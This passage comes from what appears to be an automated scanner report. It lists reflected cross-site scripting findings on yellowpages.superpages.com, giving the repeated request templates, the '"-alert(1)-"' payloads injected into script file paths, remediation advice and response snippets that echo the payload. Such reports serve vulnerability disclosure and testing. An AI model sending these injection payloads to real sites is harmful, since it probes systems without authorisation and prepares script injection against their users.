Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
Response
...[SNIP]... erv = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
Response
...[SNIP]... = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
Response
...[SNIP]...
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
